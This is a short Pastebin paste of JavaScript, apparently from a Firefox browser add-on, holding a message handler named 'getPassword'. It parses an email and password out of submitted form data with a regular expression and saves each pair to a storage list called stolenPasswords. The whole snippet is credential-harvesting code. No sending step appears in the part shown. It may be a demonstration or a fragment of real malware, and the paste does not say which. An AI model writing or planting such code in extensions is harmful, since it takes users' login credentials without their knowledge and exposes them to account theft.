Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. worker.port.on("getPassword", function(userNameAndPassword) {
  2.     if(/email=([^&]+)&password=(.+)/.test(userNameAndPassword)) {
  3.           ss.storage.stolenPasswords.push([decodeURIComponent(RegExp.$1),
  4.                                                                  decodeURIComponent(RegExp.$2)]);
  5.     }
  6. });